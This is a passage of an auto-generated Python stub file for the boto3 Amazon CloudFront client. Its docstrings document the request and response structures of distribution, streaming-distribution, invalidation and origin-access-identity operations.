123, 'MaxTTL': 123, 'Compress': True|False, 'LambdaFunctionAssociations': { 'Quantity': 123, 'Items': [ { 'LambdaFunctionARN': 'string', 'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response' }, ] } }, ] }, 'CustomErrorResponses': { 'Quantity': 123, 'Items': [ { 'ErrorCode': 123, 'ResponsePagePath': 'string', 'ResponseCode': 'string', 'ErrorCachingMinTTL': 123 }, ] }, 'Comment': 'string', 'Logging': { 'Enabled': True|False, 'IncludeCookies': True|False, 'Bucket': 'string', 'Prefix': 'string' }, 'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All', 'Enabled': True|False, 'ViewerCertificate': { 'CloudFrontDefaultCertificate': True|False, 'IAMCertificateId': 'string', 'ACMCertificateArn': 'string', 'SSLSupportMethod': 'sni-only'|'vip', 'MinimumProtocolVersion': 'SSLv3'|'TLSv1', 'Certificate': 'string', 'CertificateSource': 'cloudfront'|'iam'|'acm' }, 'Restrictions': { 'GeoRestriction': { 'RestrictionType': 'blacklist'|'whitelist'|'none', 'Quantity': 123, 'Items': [ 'string', ] } }, 'WebACLId': 'string', 'HttpVersion': 'http1.1'|'http2', 'IsIPV6Enabled': True|False } }, 'Location': 'string', 'ETag': 'string' } :returns: If you configured Amazon S3 Transfer Acceleration for your bucket, do not specify the s3-accelerate endpoint for DomainName . The bucket name must be between 3 and 63 characters long (inclusive). The bucket name must contain only lowercase characters, numbers, periods, underscores, and dashes. The bucket name must not contain adjacent periods. """ pass def create_invalidation(DistributionId=None, InvalidationBatch=None): """ Create a new invalidation. See also: AWS API Documentation :example: response = client.create_invalidation( DistributionId='string', InvalidationBatch={ 'Paths': { 'Quantity': 123, 'Items': [ 'string', ] }, 'CallerReference': 'string' } ) :type DistributionId: string :param DistributionId: [REQUIRED] The distribution's id. :type InvalidationBatch: dict :param InvalidationBatch: [REQUIRED] The batch information for the invalidation. Paths (dict) -- [REQUIRED]A complex type that contains information about the objects that you want to invalidate. For more information, see Specifying the Objects to Invalidate in the Amazon CloudFront Developer Guide . Quantity (integer) -- [REQUIRED]The number of objects that you want to invalidate. Items (list) --A complex type that contains a list of the paths that you want to invalidate. (string) -- CallerReference (string) -- [REQUIRED]A value that you specify to uniquely identify an invalidation request. CloudFront uses the value to prevent you from accidentally resubmitting an identical request. Whenever you create a new invalidation request, you must specify a new value for CallerReference and change other values in the request as applicable. One way to ensure that the value of CallerReference is unique is to use a timestamp , for example, 20120301090000 . If you make a second invalidation request with the same value for CallerReference , and if the rest of the request is the same, CloudFront doesn't create a new invalidation request. Instead, CloudFront returns information about the invalidation request that you previously created with the same CallerReference . If CallerReference is a value you already sent in a previous invalidation batch request but the content of any Path is different from the original request, CloudFront returns an InvalidationBatchAlreadyExists error. :rtype: dict :return: { 'Location': 'string', 'Invalidation': { 'Id': 'string', 'Status': 'string', 'CreateTime': datetime(2015, 1, 1), 'InvalidationBatch': { 'Paths': { 'Quantity': 123, 'Items': [ 'string', ] }, 'CallerReference': 'string' } } } :returns: (string) -- """ pass def create_streaming_distribution(StreamingDistributionConfig=None): """ Creates a new RMTP distribution. An RTMP distribution is similar to a web distribution, but an RTMP distribution streams media files using the Adobe Real-Time Messaging Protocol (RTMP) instead of serving files using HTTP. To create a new web distribution, submit a POST request to the CloudFront API version /distribution resource. The request body must include a document with a StreamingDistributionConfig element. The response echoes the StreamingDistributionConfig element and returns other information about the RTMP distribution. To get the status of your request, use the GET StreamingDistribution API action. When the value of Enabled is true and the value of Status is Deployed , your distribution is ready. A distribution usually deploys in less than 15 minutes. For more information about web distributions, see Working with RTMP Distributions in the Amazon CloudFront Developer Guide . See also: AWS API Documentation :example: response = client.create_streaming_distribution( StreamingDistributionConfig={ 'CallerReference': 'string', 'S3Origin': { 'DomainName': 'string', 'OriginAccessIdentity': 'string' }, 'Aliases': { 'Quantity': 123, 'Items': [ 'string', ] }, 'Comment': 'string', 'Logging': { 'Enabled': True|False, 'Bucket': 'string', 'Prefix': 'string' }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All', 'Enabled': True|False } ) :type StreamingDistributionConfig: dict :param StreamingDistributionConfig: [REQUIRED] The streaming distribution's configuration information. CallerReference (string) -- [REQUIRED]A unique number that ensures that the request can't be replayed. If the CallerReference is new (no matter the content of the StreamingDistributionConfig object), a new streaming distribution is created. If the CallerReference is a value that you already sent in a previous request to create a streaming distribution, and the content of the StreamingDistributionConfig is identical to the original request (ignoring white space), the response includes the same information returned to the original request. If the CallerReference is a value that you already sent in a previous request to create a streaming distribution but the content of the StreamingDistributionConfig is different from the original request, CloudFront returns a DistributionAlreadyExists error. S3Origin (dict) -- [REQUIRED]A complex type that contains information about the Amazon S3 bucket from which you want CloudFront to get your media files for distribution. DomainName (string) -- [REQUIRED]The DNS name of the Amazon S3 origin. OriginAccessIdentity (string) -- [REQUIRED]The CloudFront origin access identity to associate with the RTMP distribution. Use an origin access identity to configure the distribution so that end users can only access objects in an Amazon S3 bucket through CloudFront. If you want end users to be able to access objects using either the CloudFront URL or the Amazon S3 URL, specify an empty OriginAccessIdentity element. To delete the origin access identity from an existing distribution, update the distribution configuration and include an empty OriginAccessIdentity element. To replace the origin access identity, update the distribution configuration and specify the new origin access identity. For more information, see Using an Origin Access Identity to Restrict Access to Your Amazon S3 Content in the Amazon Amazon CloudFront Developer Guide . Aliases (dict) --A complex type that contains information about CNAMEs (alternate domain names), if any, for this streaming distribution. Quantity (integer) -- [REQUIRED]The number of CNAME aliases, if any, that you want to associate with this distribution. Items (list) --A complex type that contains the CNAME aliases, if any, that you want to associate with this distribution. (string) -- Comment (string) -- [REQUIRED]Any comments you want to include about the streaming distribution. Logging (dict) --A complex type that controls whether access logs are written for the streaming distribution. Enabled (boolean) -- [REQUIRED]Specifies whether you want CloudFront to save access logs to an Amazon S3 bucket. If you do not want to enable logging when you create a streaming distribution or if you want to disable logging for an existing streaming distribution, specify false for Enabled , and specify empty Bucket and Prefix elements. If you specify false for Enabled but you specify values for Bucket and Prefix , the values are automatically deleted. Bucket (string) -- [REQUIRED]The Amazon S3 bucket to store the access logs in, for example, myawslogbucket.s3.amazonaws.com . Prefix (string) -- [REQUIRED]An optional string that you want CloudFront to prefix to the access log filenames for this streaming distribution, for example, myprefix/ . If you want to enable logging, but you do not want to specify a prefix, you still must include an empty Prefix element in the Logging element. TrustedSigners (dict) -- [REQUIRED]A complex type that specifies any AWS accounts that you want to permit to create signed URLs for private content. If you want the distribution to use signed URLs, include this element; if you want the distribution to use public URLs, remove this element. For more information, see Serving Private Content through CloudFront in the Amazon CloudFront Developer Guide . Enabled (boolean) -- [REQUIRED]Specifies whether you want to require viewers to use signed URLs to access the files specified by PathPattern and TargetOriginId . Quantity (integer) -- [REQUIRED]The number of trusted signers for this cache behavior. Items (list) -- Optional : A complex type that contains trusted signers for this cache behavior. If Quantity is 0 , you can omit Items . (string) -- PriceClass (string) --A complex type that contains information about price class for this streaming distribution. Enabled (boolean) -- [REQUIRED]Whether the streaming distribution is enabled to accept user requests for content. :rtype: dict :return: { 'StreamingDistribution': { 'Id': 'string', 'ARN': 'string', 'Status': 'string', 'LastModifiedTime': datetime(2015, 1, 1), 'DomainName': 'string', 'ActiveTrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ { 'AwsAccountNumber': 'string', 'KeyPairIds': { 'Quantity': 123, 'Items': [ 'string', ] } }, ] }, 'StreamingDistributionConfig': { 'CallerReference': 'string', 'S3Origin': { 'DomainName': 'string', 'OriginAccessIdentity': 'string' }, 'Aliases': { 'Quantity': 123, 'Items': [ 'string', ] }, 'Comment': 'string', 'Logging': { 'Enabled': True|False, 'Bucket': 'string', 'Prefix': 'string' }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All', 'Enabled': True|False } }, 'Location': 'string', 'ETag': 'string' } :returns: (string) -- """ pass def create_streaming_distribution_with_tags(StreamingDistributionConfigWithTags=None): """ Create a new streaming distribution with tags. See also: AWS API Documentation :example: response = client.create_streaming_distribution_with_tags( StreamingDistributionConfigWithTags={ 'StreamingDistributionConfig': { 'CallerReference': 'string', 'S3Origin': { 'DomainName': 'string', 'OriginAccessIdentity': 'string' }, 'Aliases': { 'Quantity': 123, 'Items': [ 'string', ] }, 'Comment': 'string', 'Logging': { 'Enabled': True|False, 'Bucket': 'string', 'Prefix': 'string' }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All', 'Enabled': True|False }, 'Tags': { 'Items': [ { 'Key': 'string', 'Value': 'string' }, ] } } ) :type StreamingDistributionConfigWithTags: dict :param StreamingDistributionConfigWithTags: [REQUIRED] The streaming distribution's configuration information. StreamingDistributionConfig (dict) -- [REQUIRED]A streaming distribution Configuration. CallerReference (string) -- [REQUIRED]A unique number that ensures that the request can't be replayed. If the CallerReference is new (no matter the content of the StreamingDistributionConfig object), a new streaming distribution is created. If the CallerReference is a value that you already sent in a previous request to create a streaming distribution, and the content of the StreamingDistributionConfig is identical to the original request (ignoring white space), the response includes the same information returned to the original request. If the CallerReference is a value that you already sent in a previous request to create a streaming distribution but the content of the StreamingDistributionConfig is different from the original request, CloudFront returns a DistributionAlreadyExists error. S3Origin (dict) -- [REQUIRED]A complex type that contains information about the Amazon S3 bucket from which you want CloudFront to get your media files for distribution. DomainName (string) -- [REQUIRED]The DNS name of the Amazon S3 origin. OriginAccessIdentity (string) -- [REQUIRED]The CloudFront origin access identity to associate with the RTMP distribution. Use an origin access identity to configure the distribution so that end users can only access objects in an Amazon S3 bucket through CloudFront. If you want end users to be able to access objects using either the CloudFront URL or the Amazon S3 URL, specify an empty OriginAccessIdentity element. To delete the origin access identity from an existing distribution, update the distribution configuration and include an empty OriginAccessIdentity element. To replace the origin access identity, update the distribution configuration and specify the new origin access identity. For more information, see Using an Origin Access Identity to Restrict Access to Your Amazon S3 Content in the Amazon Amazon CloudFront Developer Guide . Aliases (dict) --A complex type that contains information about CNAMEs (alternate domain names), if any, for this streaming distribution. Quantity (integer) -- [REQUIRED]The number of CNAME aliases, if any, that you want to associate with this distribution. Items (list) --A complex type that contains the CNAME aliases, if any, that you want to associate with this distribution. (string) -- Comment (string) -- [REQUIRED]Any comments you want to include about the streaming distribution. Logging (dict) --A complex type that controls whether access logs are written for the streaming distribution. Enabled (boolean) -- [REQUIRED]Specifies whether you want CloudFront to save access logs to an Amazon S3 bucket. If you do not want to enable logging when you create a streaming distribution or if you want to disable logging for an existing streaming distribution, specify false for Enabled , and specify empty Bucket and Prefix elements. If you specify false for Enabled but you specify values for Bucket and Prefix , the values are automatically deleted. Bucket (string) -- [REQUIRED]The Amazon S3 bucket to store the access logs in, for example, myawslogbucket.s3.amazonaws.com . Prefix (string) -- [REQUIRED]An optional string that you want CloudFront to prefix to the access log filenames for this streaming distribution, for example, myprefix/ . If you want to enable logging, but you do not want to specify a prefix, you still must include an empty Prefix element in the Logging element. TrustedSigners (dict) -- [REQUIRED]A complex type that specifies any AWS accounts that you want to permit to create signed URLs for private content. If you want the distribution to use signed URLs, include this element; if you want the distribution to use public URLs, remove this element. For more information, see Serving Private Content through CloudFront in the Amazon CloudFront Developer Guide . Enabled (boolean) -- [REQUIRED]Specifies whether you want to require viewers to use signed URLs to access the files specified by PathPattern and TargetOriginId . Quantity (integer) -- [REQUIRED]The number of trusted signers for this cache behavior. Items (list) -- Optional : A complex type that contains trusted signers for this cache behavior. If Quantity is 0 , you can omit Items . (string) -- PriceClass (string) --A complex type that contains information about price class for this streaming distribution. Enabled (boolean) -- [REQUIRED]Whether the streaming distribution is enabled to accept user requests for content. Tags (dict) -- [REQUIRED]A complex type that contains zero or more Tag elements. Items (list) --A complex type that contains Tag elements. (dict) --A complex type that contains Tag key and Tag value. Key (string) -- [REQUIRED]A string that contains Tag key. The string length should be between 1 and 128 characters. Valid characters include a-z , A-Z , 0-9 , space, and the special characters _ - . : / = + @ . Value (string) --A string that contains an optional Tag value. The string length should be between 0 and 256 characters. Valid characters include a-z , A-Z , 0-9 , space, and the special characters _ - . : / = + @ . :rtype: dict :return: { 'StreamingDistribution': { 'Id': 'string', 'ARN': 'string', 'Status': 'string', 'LastModifiedTime': datetime(2015, 1, 1), 'DomainName': 'string', 'ActiveTrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ { 'AwsAccountNumber': 'string', 'KeyPairIds': { 'Quantity': 123, 'Items': [ 'string', ] } }, ] }, 'StreamingDistributionConfig': { 'CallerReference': 'string', 'S3Origin': { 'DomainName': 'string', 'OriginAccessIdentity': 'string' }, 'Aliases': { 'Quantity': 123, 'Items': [ 'string', ] }, 'Comment': 'string', 'Logging': { 'Enabled': True|False, 'Bucket': 'string', 'Prefix': 'string' }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All', 'Enabled': True|False } }, 'Location': 'string', 'ETag': 'string' } :returns: (string) -- """ pass def delete_cloud_front_origin_access_identity(Id=None, IfMatch=None): """ Delete an origin access identity. See also: AWS API Documentation :example: response = client.delete_cloud_front_origin_access_identity( Id='string', IfMatch='string' ) :type Id: string :param Id: [REQUIRED] The origin access identity's ID. :type IfMatch: string :param IfMatch: The value of the ETag header you received from a previous GET or PUT request. For example: E2QWRUHAPOMQZL . """ pass def delete_distribution(Id=None, IfMatch=None): """ Delete a distribution. See also: AWS API Documentation :example: response = client.delete_distribution( Id='string', IfMatch='string' ) :type Id: string :param Id: [REQUIRED] The distribution ID. :type IfMatch: string :param IfMatch: The value of the ETag header that you received when you disabled the distribution. For example: E2QWRUHAPOMQZL . """ pass def delete_streaming_distribution(Id=None, IfMatch=None): """ Delete a streaming distribution. To delete an RTMP distribution using the CloudFront API, perform the following steps. For information about deleting a distribution using the CloudFront console, see Deleting a Distribution in the Amazon CloudFront Developer Guide . See also: AWS API Documentation :example: response = client.delete_streaming_distribution( Id='string', IfMatch='string' ) :type Id: string :param Id: [REQUIRED] The distribution ID. :type IfMatch: string :param IfMatch: The value of the ETag header that you received when you disabled the streaming distribution. For example: E2QWRUHAPOMQZL . :returns: Id (string) -- [REQUIRED] The distribution ID. IfMatch (string) -- The value of the ETag header that you received when you disabled the streaming distribution. For example: E2QWRUHAPOMQZL . """ pass def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None): """ Generate a presigned url given a client, its method, and arguments :type ClientMethod: string :param ClientMethod: The client method to presign for :type Params: dict :param Params: The parameters normally passed to ClientMethod. :type ExpiresIn: int :param ExpiresIn: The number of seconds the presigned url is valid for. By default it expires in an hour (3600 seconds) :type HttpMethod: string :param HttpMethod: The http method to use on the generated url. By default, the http method is whatever is used in the method's model. """ pass def get_cloud_front_origin_access_identity(Id=None): """ Get the information about an origin access identity. See also: AWS API Documentation :example: response = client.get_cloud_front_origin_access_identity( Id='string' ) :type Id: string :param Id: [REQUIRED] The identity's ID. :rtype: dict :return: { 'CloudFrontOriginAccessIdentity': { 'Id': 'string', 'S3CanonicalUserId': 'string', 'CloudFrontOriginAccessIdentityConfig': { 'CallerReference': 'string', 'Comment': 'string' } }, 'ETag': 'string' } """ pass def get_cloud_front_origin_access_identity_config(Id=None): """ Get the configuration information about an origin access identity. See also: AWS API Documentation :example: response = client.get_cloud_front_origin_access_identity_config( Id='string' ) :type Id: string :param Id: [REQUIRED] The identity's ID. :rtype: dict :return: { 'CloudFrontOriginAccessIdentityConfig': { 'CallerReference': 'string', 'Comment': 'string' }, 'ETag': 'string' } """ pass def get_distribution(Id=None): """ Get the information about a distribution. See also: AWS API Documentation :example: response = client.get_distribution( Id='string' ) :type Id: string :param Id: [REQUIRED] The distribution's ID. :rtype: dict :return: { 'Distribution': { 'Id': 'string', 'ARN': 'string', 'Status': 'string', 'LastModifiedTime': datetime(2015, 1, 1), 'InProgressInvalidationBatches': 123, 'DomainName': 'string', 'ActiveTrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ { 'AwsAccountNumber': 'string', 'KeyPairIds': { 'Quantity': 123, 'Items': [ 'string', ] } }, ] }, 'DistributionConfig': { 'CallerReference': 'string', 'Aliases': { 'Quantity': 123, 'Items': [ 'string', ] }, 'DefaultRootObject': 'string', 'Origins': { 'Quantity': 123, 'Items': [ { 'Id': 'string', 'DomainName': 'string', 'OriginPath': 'string', 'CustomHeaders': { 'Quantity': 123, 'Items': [ { 'HeaderName': 'string', 'HeaderValue': 'string' }, ] }, 'S3OriginConfig': { 'OriginAccessIdentity': 'string' }, 'CustomOriginConfig': { 'HTTPPort': 123, 'HTTPSPort': 123, 'OriginProtocolPolicy': 'http-only'|'match-viewer'|'https-only', 'OriginSslProtocols': { 'Quantity': 123, 'Items': [ 'SSLv3'|'TLSv1'|'TLSv1.1'|'TLSv1.2', ] }, 'OriginReadTimeout': 123, 'OriginKeepaliveTimeout': 123 } }, ] }, 'DefaultCacheBehavior': { 'TargetOriginId': 'string', 'ForwardedValues': { 'QueryString': True|False, 'Cookies': { 'Forward': 'none'|'whitelist'|'all', 'WhitelistedNames': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'Headers': { 'Quantity': 123, 'Items': [ 'string', ] }, 'QueryStringCacheKeys': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https', 'MinTTL': 123, 'AllowedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ], 'CachedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ] } }, 'SmoothStreaming': True|False, 'DefaultTTL': 123, 'MaxTTL': 123, 'Compress': True|False, 'LambdaFunctionAssociations': { 'Quantity': 123, 'Items': [ { 'LambdaFunctionARN': 'string', 'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response' }, ] } }, 'CacheBehaviors': { 'Quantity': 123, 'Items': [ { 'PathPattern': 'string', 'TargetOriginId': 'string', 'ForwardedValues': { 'QueryString': True|False, 'Cookies': { 'Forward': 'none'|'whitelist'|'all', 'WhitelistedNames': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'Headers': { 'Quantity': 123, 'Items': [ 'string', ] }, 'QueryStringCacheKeys': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https', 'MinTTL': 123, 'AllowedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ], 'CachedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ] } }, 'SmoothStreaming': True|False, 'DefaultTTL': 123, 'MaxTTL': 123, 'Compress': True|False, 'LambdaFunctionAssociations': { 'Quantity': 123, 'Items': [ { 'LambdaFunctionARN': 'string', 'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response' }, ] } }, ] }, 'CustomErrorResponses': { 'Quantity': 123, 'Items': [ { 'ErrorCode': 123, 'ResponsePagePath': 'string', 'ResponseCode': 'string', 'ErrorCachingMinTTL': 123 }, ] }, 'Comment': 'string', 'Logging': { 'Enabled': True|False, 'IncludeCookies': True|False, 'Bucket': 'string', 'Prefix': 'string' }, 'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All', 'Enabled': True|False, 'ViewerCertificate': { 'CloudFrontDefaultCertificate': True|False, 'IAMCertificateId': 'string', 'ACMCertificateArn': 'string', 'SSLSupportMethod': 'sni-only'|'vip', 'MinimumProtocolVersion': 'SSLv3'|'TLSv1', 'Certificate': 'string', 'CertificateSource': 'cloudfront'|'iam'|'acm' }, 'Restrictions': { 'GeoRestriction': { 'RestrictionType': 'blacklist'|'whitelist'|'none', 'Quantity': 123, 'Items': [ 'string', ] } }, 'WebACLId': 'string', 'HttpVersion': 'http1.1'|'http2', 'IsIPV6Enabled': True|False } }, 'ETag': 'string' } :returns: (string) -- """ pass def get_distribution_config(Id=None): """ Get the configuration information about a distribution. See also: AWS API Documentation :example: response = client.get_distribution_config( Id='string' ) :type Id: string :param Id: [REQUIRED] The distribution's ID. :rtype: dict :return: { 'DistributionConfig': { 'CallerReference': 'string', 'Aliases': { 'Quantity': 123, 'Items': [ 'string', ] }, 'DefaultRootObject': 'string', 'Origins': { 'Quantity': 123, 'Items': [ { 'Id': 'string', 'DomainName': 'string', 'OriginPath': 'string', 'CustomHeaders': { 'Quantity': 123, 'Items': [ { 'HeaderName': 'string', 'HeaderValue': 'string' }, ] }, 'S3OriginConfig': { 'OriginAccessIdentity': 'string' }, 'CustomOriginConfig': { 'HTTPPort': 123, 'HTTPSPort': 123, 'OriginProtocolPolicy': 'http-only'|'match-viewer'|'https-only', 'OriginSslProtocols': { 'Quantity': 123, 'Items': [ 'SSLv3'|'TLSv1'|'TLSv1.1'|'TLSv1.2', ] }, 'OriginReadTimeout': 123, 'OriginKeepaliveTimeout': 123 } }, ] }, 'DefaultCacheBehavior': { 'TargetOriginId': 'string', 'ForwardedValues': { 'QueryString': True|False, 'Cookies': { 'Forward': 'none'|'whitelist'|'all', 'WhitelistedNames': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'Headers': { 'Quantity': 123, 'Items': [ 'string', ] }, 'QueryStringCacheKeys': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https', 'MinTTL': 123, 'AllowedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ], 'CachedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ] } }, 'SmoothStreaming': True|False, 'DefaultTTL': 123, 'MaxTTL': 123, 'Compress': True|False, 'LambdaFunctionAssociations': { 'Quantity': 123, 'Items': [ { 'LambdaFunctionARN': 'string', 'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response' }, ] } }, 'CacheBehaviors': { 'Quantity': 123, 'Items': [ { 'PathPattern': 'string', 'TargetOriginId': 'string', 'ForwardedValues': { 'QueryString': True|False, 'Cookies': { 'Forward': 'none'|'whitelist'|'all', 'WhitelistedNames': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'Headers': { 'Quantity': 123, 'Items': [ 'string', ] }, 'QueryStringCacheKeys': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https', 'MinTTL': 123, 'AllowedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ], 'CachedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ] } }, 'SmoothStreaming': True|False, 'DefaultTTL': 123, 'MaxTTL': 123, 'Compress': True|False, 'LambdaFunctionAssociations': { 'Quantity': 123, 'Items': [ { 'LambdaFunctionARN': 'string', 'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response' }, ] } }, ] }, 'CustomErrorResponses': { 'Quantity': 123, 'Items': [ { 'ErrorCode': 123, 'ResponsePagePath': 'string', 'ResponseCode': 'string', 'ErrorCachingMinTTL': 123 }, ] }, 'Comment': 'string', 'Logging': { 'Enabled': True|False, 'IncludeCookies': True|False, 'Bucket': 'string', 'Prefix': 'string' }, 'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All', 'Enabled': True|False, 'ViewerCertificate': { 'CloudFrontDefaultCertificate': True|False, 'IAMCertificateId': 'string', 'ACMCertificateArn': 'string', 'SSLSupportMethod': 'sni-only'|'vip', 'MinimumProtocolVersion': 'SSLv3'|'TLSv1', 'Certificate': 'string', 'CertificateSource': 'cloudfront'|'iam'|'acm' }, 'Restrictions': { 'GeoRestriction': { 'RestrictionType': 'blacklist'|'whitelist'|'none', 'Quantity': 123, 'Items': [ 'string', ] } }, 'WebACLId': 'string', 'HttpVersion': 'http1.1'|'http2', 'IsIPV6Enabled': True|False }, 'ETag': 'string' } :returns: If you configured Amazon S3 Transfer Acceleration for your bucket, do not specify the s3-accelerate endpoint for DomainName . The bucket name must be between 3 and 63 characters long (inclusive). The bucket name must contain only lowercase characters, numbers, periods, underscores, and dashes. The bucket name must not contain adjacent periods. """ pass def get_invalidation(DistributionId=None, Id=None): """ Get the information about an invalidation. See also: AWS API Documentation :example: response = client.get_invalidation( DistributionId='string', Id='string' ) :type DistributionId: string :param DistributionId: [REQUIRED] The distribution's ID. :type Id: string :param Id: [REQUIRED] The identifier for the invalidation request, for example, IDFDVBD632BHDS5 . :rtype: dict :return: { 'Invalidation': { 'Id': 'string', 'Status': 'string', 'CreateTime': datetime(2015, 1, 1), 'InvalidationBatch': { 'Paths': { 'Quantity': 123, 'Items': [ 'string', ] }, 'CallerReference': 'string' } } } :returns: (string) -- """ pass def get_paginator(operation_name=None): """ Create a paginator for an operation. :type operation_name: string :param operation_name: The operation name. This is the same name as the method name on the client. For example, if the method name is create_foo, and you'd normally invoke the operation as client.create_foo(**kwargs), if the create_foo operation can be paginated, you can use the call client.get_paginator('create_foo'). :rtype: L{botocore.paginate.Paginator} """ pass def get_streaming_distribution(Id=None): """ Gets information about a specified RTMP distribution, including the distribution configuration. See also: AWS API Documentation :example: response = client.get_streaming_distribution( Id='string' ) :type Id: string :param Id: [REQUIRED] The streaming distribution's ID. :rtype: dict :return: { 'StreamingDistribution': { 'Id': 'string', 'ARN': 'string', 'Status': 'string', 'LastModifiedTime': datetime(2015, 1, 1), 'DomainName': 'string', 'ActiveTrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ { 'AwsAccountNumber': 'string', 'KeyPairIds': { 'Quantity': 123, 'Items': [ 'string', ] } }, ] }, 'StreamingDistributionConfig': { 'CallerReference': 'string', 'S3Origin': { 'DomainName': 'string', 'OriginAccessIdentity': 'string' }, 'Aliases': { 'Quantity': 123, 'Items': [ 'string', ] }, 'Comment': 'string', 'Logging': { 'Enabled': True|False, 'Bucket': 'string', 'Prefix': 'string' }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All', 'Enabled': True|False } }, 'ETag': 'string' } :returns: (string) -- """ pass def get_streaming_distribution_config(Id=None): """ Get the configuration information about a streaming distribution. See also: AWS API Documentation :example: response = client.get_streaming_distribution_config( Id='string' ) :type Id: string :param Id: [REQUIRED] The streaming distribution's ID. :rtype: dict :return: { 'StreamingDistributionConfig': { 'CallerReference': 'string', 'S3Origin': { 'DomainName': 'string', 'OriginAccessIdentity': 'string' }, 'Aliases': { 'Quantity': 123, 'Items': [ 'string', ] }, 'Comment': 'string', 'Logging': { 'Enabled': True|False, 'Bucket': 'string', 'Prefix': 'string' }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All', 'Enabled': True|False }, 'ETag': 'string' } :returns: (string) -- """ pass def get_waiter(): """ """ pass def list_cloud_front_origin_access_identities(Marker=None, MaxItems=None): """ Lists origin access identities. See also: AWS API Documentation :example: response = client.list_cloud_front_origin_access_identities( Marker='string', MaxItems='string' ) :type Marker: string :param Marker: Use this when paginating results to indicate where to begin in your list of origin access identities. The results include identities in the list that occur after the marker. To get the next page of results, set the Marker to the value of the NextMarker from the current page's response (which is also the ID of the last identity on that page). :type MaxItems: string :param MaxItems: The maximum number of origin access identities you want in the response body. :rtype: dict :return: { 'CloudFrontOriginAccessIdentityList': { 'Marker': 'string', 'NextMarker': 'string', 'MaxItems': 123, 'IsTruncated': True|False, 'Quantity': 123, 'Items': [ { 'Id': 'string', 'S3CanonicalUserId': 'string', 'Comment': 'string' }, ] } } """ pass def list_distributions(Marker=None, MaxItems=None): """ List distributions. See also: AWS API Documentation :example: response = client.list_distributions( Marker='string', MaxItems='string' ) :type Marker: string :param Marker: Use this when paginating results to indicate where to begin in your list of distributions. The results include distributions in the list that occur after the marker. To get the next page of results, set the Marker to the value of the NextMarker from the current page's response (which is also the ID of the last distribution on that page). :type MaxItems: string :param MaxItems: The maximum number of distributions you want in the response body. :rtype: dict :return: { 'DistributionList': { 'Marker': 'string', 'NextMarker': 'string', 'MaxItems': 123, 'IsTruncated': True|False, 'Quantity': 123, 'Items': [ { 'Id': 'string', 'ARN': 'string', 'Status': 'string', 'LastModifiedTime': datetime(2015, 1, 1), 'DomainName': 'string', 'Aliases': { 'Quantity': 123, 'Items': [ 'string', ] }, 'Origins': { 'Quantity': 123, 'Items': [ { 'Id': 'string', 'DomainName': 'string', 'OriginPath': 'string', 'CustomHeaders': { 'Quantity': 123, 'Items': [ { 'HeaderName': 'string', 'HeaderValue': 'string' }, ] }, 